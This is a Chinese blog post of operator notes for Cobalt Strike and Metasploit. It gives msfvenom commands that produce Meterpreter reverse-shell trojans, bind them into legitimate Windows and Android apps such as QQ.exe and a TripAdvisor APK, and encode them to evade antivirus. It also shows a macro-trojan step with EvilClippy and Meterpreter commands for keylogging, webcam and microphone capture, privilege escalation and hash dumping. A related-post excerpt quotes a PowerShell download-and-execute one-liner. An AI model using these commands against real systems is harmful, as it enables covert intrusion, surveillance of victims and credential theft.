Cobaltstrike与msf

最新推荐文章于 2024-03-06 12:00:00 发布
最新推荐文章于 2024-03-06 12:00:00 发布
阅读量1.2k 收藏 2
点赞数 1
分类专栏: 安全 免杀 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_33942040/article/details/108440262
版权

一,常见错误

CS

1.)使用方法
①在cs安装目录中,执行(注意管理员权限下)

.\Keytool.exe -keystore ./cobaltstrike.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias cobaltstrike -dname "CN=Major Cobalt Strike, OU=AdvancedPenTesting, O=cobaltstrike, L=Somewhere, S=Cyberspace, C=Earth"


.\teamserver.bat ip 1234
#8.8.8.8为你的服务器外网IP,123456为Coabltstrike的客户端密码

②然后启动cs界面输入密码连接即可
在这里插入图片描述
在这里插入图片描述
配置监听
在这里插入图片描述

2.)配合EvilClippy形成宏木马类
生成宏文件
EvilClippy创建
vba创建

#生成宏木马
EvilClippy.exe -s 2.vba 233.docm

msf

易错bug+常见命令类操作
①解决更新后报错的方法

②进行监听的方法

msfconsole#启动监听程序
#在msf中进行监听
use exploit/multi/handler
#选择启动监听的模块
set payload windows/meterpreter/reverse_https
#选择监听的端口
set lport 3334
#选择监听的ip
set lhost ip
启动上线
 exploit

二,生成木马且进行控制

1.msfvemon生成木马

列出漏洞模块命令–>show payloads
在这里插入图片描述

指定生成类状况参数
在这里插入图片描述

-p payloads
-f 输出格式
-o 输入地址
-e 编码方式(msfvenom -l -encoder 可以查看能使用的编码)
-x | -k 绑定程序 (例如 –x C:\nomal.exe –k –f exe –o C:\shell.exe)

1.生成基础的木马与连接

msfvenom -p windows/meterpreter/reverse_tcp LPORT=443 LHOST=192.168.18.130  -f exe -o 123.exe
#-o的含义是生成木马的保存的路径
msfvenom -p windows/meterpreter/reverse_tcp   x86/single_static_bit -i  LHOST=192.168.18.130	LPORT=4444  -f c

在这里插入图片描述–>注意一般msfvemon生成的马典型利用该方法进行连接

①use exploit/multi/handler
②set payload windows/meterpreter/reverse_tcp
③set lhost  ip
④set lport  端口
⑤exploit #进行执行即可

注意点
有点时候会连接不上–>原因:典型导致的是程序没有运行导致的
2.绑定程序制作木马
①查看编码类型

msfvenom -l encoders

在这里插入图片描述
②捆绑木马
如选择x86/shikata_ga_nai进行编码

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.110 LPORT=8080 -e x86/shikata_ga_nai -x /root/lenkee/share/QQ.exe -i 5 -f exe -o /root/lenkee/share/QQ1.exe
#-i 5的含义是进行5次编码
#-x 即选择捆绑软件的地址
#-e 设置编码的类型格式

③连接方式类与上面同
注意点:
1.捆绑需要软件存在注入点才可以进行捆绑
3.捆绑手机app

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.43.6 LPORT=4444 -x tripadvisor.apk -k -o ta-rat.apk

2.组合使用类

#生成相关的文件
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.122.101 -f elf -o /root/payload.elf
#选择上面且进行捆绑木马-->-o即输出保存的路径
#-x选项:允许我们指定一个自定义的可执行文件作为模板,也就是将木马捆绑到这个可执行文件上。
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.122.101 -f elf -x /root/payload.elf -o /root/payload_backdoor.elf
#实现免杀
$ msfvenom -l encoders#查看编码的类型
#选择编码器进行编码
$ cd /usr/share
$ msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.122.101 -e x86/shikata_ga_nai -i 5 -f elf -o /root/payload_encoder.elf

2.msfconsole进行监听与进行远控

查看上钩用户
sessions(查看上钩的用户类)
在这里插入图片描述

指定用户进行攻击

  1. sessions -i 1(选择需要攻击的用户,这里选择第 1 个)
  2. shell (执行shell)
    在这里插入图片描述

远控命令

进入meterpreter之后即可进行一些相关木马操作
常见的命令

用户操作
Stdapi: User interface Commands(用户接口命令)
enumdesktops -->列出所有可访问的桌面和窗口站(窗体列表)
getdesktop -->得到当前的Meterpreter桌面
idletime -->返回秒远程用户已经闲置数量
键盘记录类命令
keyscan_start -->开始捕获击键(开始键盘记录)
keyscan_dump -->转储按键缓冲(下载键盘记录)
keyscan_stop -->停止捕获击键(停止键盘记录)
PS:键盘记录注意点,先开始,后下载,再结束,否则会出错
屏幕类命令
screenshot -->抓取交互式桌面截图(当前操作界面截图一张)
setdesktop -->改变meterpreters当前桌面
uictl -->控制一些用户界面组件(获取键盘、鼠标控制权)
使用uictl -h 查看帮助(打开/关闭,键盘/鼠标)
摄像头类命令
摄像头:Stdapi: Webcam Commands(摄像头命令)
record_mic -->X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat -->开始视频聊天(视频,对方会有弹窗)
webcam_list -->单摄像头(查看摄像头列表)
webcam_snap -->采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream -->播放视频流从指定的摄像头(开启摄像头监控)
其他命令操作
getsystem -->获取高权限
hashdump -->获取当前用户hash


①sysinfo命令
在这里插入图片描述
②获取shell

shell

在这里插入图片描述
进行windows下的命令进行控制即可

msf安全测试渗透总结

goddemon
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CobaltStrike使用插件实现免杀
m0_74025111的博客
04-24 353
免责声明:本工具仅供安全研究和教学目的使用,用户须自行承担因使用该工具而引起的一切法律及相关责任。作者概不对任何法律责任承担责任,且保留随时中止、修改或终止本工具的权利。使用者应当遵循当地法律法规,并理解并同意本声明的所有内容。找小的 ico 图标,比如 5kb、10kb 的。Cobalt Stirke 插件,依赖 nim。导入免杀插件,点击Script Manager。启动cs,点击Connect。可以直接生成免杀shell。
全网最全的Cobalt Strike使用教程-进阶篇
喜欢Python编程的程序员柚柚呀
08-17 4567
在这篇文章中,斗哥将详细介绍一下Cobalt Strike的各个模块是干什么的以及部分模块的具体使用方式。
CobaltStrike(CS)与MetasploitFramework(MSF)联动
LuckySec
12-04 2116
0x01 CS与MSF CobaltStrike(简称CS)是一款美国Red Team开发的渗透测试神器。Armitage是一个MetasploitFramework(简称MSF)的图形化界面工具,而Cobaltstrike大家可以理解其为Armitage的商业版。 早期版本CobaltSrtike依赖MetasploitFramework框架,而现在CobaltStrike已经不再使用MetasploitFramework而是作为单独的平台使用,它分为客户端(Client)与服务端(Teamserver)
MSFCobaltStrike联动相互会话派生,并通过MSF进行内网攻击
da_chuan_chuan的博客
04-27 1534
文章目录前言一、将CS会话派生给MSF1、前期准备:2、Cobaltstrike派生会话给MSF二、MSF进行内网攻击1、前言:2、攻击步骤如下三、将MSF中的会话派生给CS1、前言2、使用步骤:总结 前言 本文主要介绍MSFCobaltStrike联动相互进行会话派生,这样可以最大化利用这两个工具的优点。同时这里还进行了衍生,通过将会话传到MSF上,MSF通过添加路由来访问内网主机,再用MSF进行永恒之蓝攻击拿下shell,并派生回CobaltStrkie。 当前网络设置为: 一、将CS会话派
msf传递shell给cobalt strike
mirror97black的博客
04-11 2230
前提:拿到msf的session会话 方法1:在cmd中执行cobalt strike的scripted web delivery命令,比如 powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.10.10.20:80/a'))" 方法2:通过msf的expl...
Cobaltstrike的安装和基本使用+MSF联动
向阳-Y.的博客
01-15 1万+
Cobaltstrike的安装和使用 cobaltstrike下载地址 下载好后,将cobaltstrike4.0-cracked.zip上传至服务器并解压,第一次运行需要安装java环境,安装完成后运行如下命令: ./teamserver 101.43.x.x password #这里的密码是一会要验证的密码,随便输入,ip是自己服务器的ip ...
Cobalt Strike4.1
12-30
Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。 Cobalt Strike集成了端口转发、扫描多模式端口Listener、Windows exe...
CobaltStrike4.0.zip
03-11
Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。
CobaltStrike中文说明.docx
06-06
很牛逼,Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有多个,可被团队进行分布式协团操作。
cobaltstrike3.6
04-15
Cobalt Strike是一款渗透测试神器,常被业界人称为CS神器。Cobalt Strike已经不再使用MSF而是作为单独的平台使用,它分为客户端与服务端,服务端是一个,客户端可以有
Cobalt Strike
06-17
CobaltStrike集成了端口转发、扫描多模式端口Listener、Windows exe程序生成、Windows dll动态链接库生成、java程序生成、office宏代码生成,包括站点克隆获取浏览器的相关信息等。 CS功能 Cobalt Strike可以使用 ...
CobaltStrike使用教程详解(基础)
逍遥小哥的博客
07-14 1万+
大家好,今天简单来聊聊CobaltStrike,这是我们后渗透阶段必不可少的神器。Cobalt Strike 是一款流行的渗透测试工具,广泛用于红队操作和渗透测试。它由Raphael Mudge创立的Strategic Cyber LLC开发,并于2012年首次发布。Cobalt Strike 提供了一套功能强大的工具和框架,用于模拟网络攻击、横向移动、特权升级、持久化访问以及命令和控制等任务。它旨在帮助安全专业人员评估和改善组织的网络防御能力,同时提供了完整的红队操作平台。
路由代理(msfCobaltStrike)与内网渗透
weixin_42478365的博客
08-12 2483
kali:192.168.239.0/24 win7:192.168.239.0/24 192.168.52.0/24 win2003:192.168.52.0/24 win2008:192.168.52.0/24 CobaltStrike代理 开启CobaltStrike 在命令行中输入 socks 22 通过火狐浏览器安装proxy扩展插件,并设定socks代理,配置完成以后,便可以成功访问到内网主机192.168.52.0/24的web应用,相关配置如下所示: 之后便可以访问内网 也可以用用
内网渗透工具CobaltStrike使用教程详解
qq_50854662的博客
12-15 2325
内网渗透工具CobaltStrike使用教程详解
Cobalt Strike与MSF的联动
weixin_42035825的博客
03-29 2858
cs的会话---->msf的会话 注意:必须安装java 我这里使用的是cs4.0版本的,所以后面的有些东西会和以前的有些差异,但并不影响。 进入目录,启动cs的服务端,命令格式:./teamserver ip 密码; 客户端有两种一种是windows版,一种是linux版。这里采用linux版本,但都必须是在java环境里面; 启动客户端: host:服务器端的ip; port:服务器...
内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )
最新发布
m0_59598029的博客
03-06 785
也有的时候会话在 MSF 上,但是我们需要 操作更简便 或者 展示力更好,所以我们会把 MSF 上的会话转移到 Cobalt Strike。内网安全:Cobalt Strike 与 MSF 联动( 会话 相互转移 )(3)开启 Cobalt Strike 工具.在 MSF 会话中 转移 会话到 CS 上.在 CS 会话中 转移 会话到 MSF 上.(5)会话转移到 MSF 中.(5)会话转移到 CS 中.(1)上线 MSF 会话.(2)进行监听模式.(4)添加一个监听.(2)添加一个监听.
渗透工具之CS4.0使用说明书
m0_59991869的博客
10-14 4646
CS4.0使用说明书 目录 安装 使用 运行 监听器 listner 使用 不同监听介绍 木马 生成后门 钓鱼攻击 邮件钓鱼 功能 上部选项栏 下部工具栏 beacon的使用 会话功能 安装使用 安装 系统环境:需要java环境Oracle Java 1.8,Oracle Java 11 下载解压就可以使用 使用 首先要运行服务端,如果你有个外网的机器,可以把服务端运行于外网的机器上,也可以运行于本地 服务端启动命令 windows 运行teamserver
upload漏洞专题
热门推荐
goddemon
12-08 11万+
①典型内容伪造假装是图片 GIF89a?
msf cobaltstrike
09-15
CobaltStrike是一个针对红队操作的渗透测试工具集,与Metasploit Framework(MSF)相比,Cobalt Strike已经不再使用MSF而是作为单独的平台使用。它包括一个服务端和多个客户端,可以进行分布式协同操作。Cobalt Strike集成了许多功能,如端口转发、扫描多模式端口Listener、Windows exe等。同时,使用CobaltStrike时,可以通过添加路由来增强其功能。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

goddemon

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值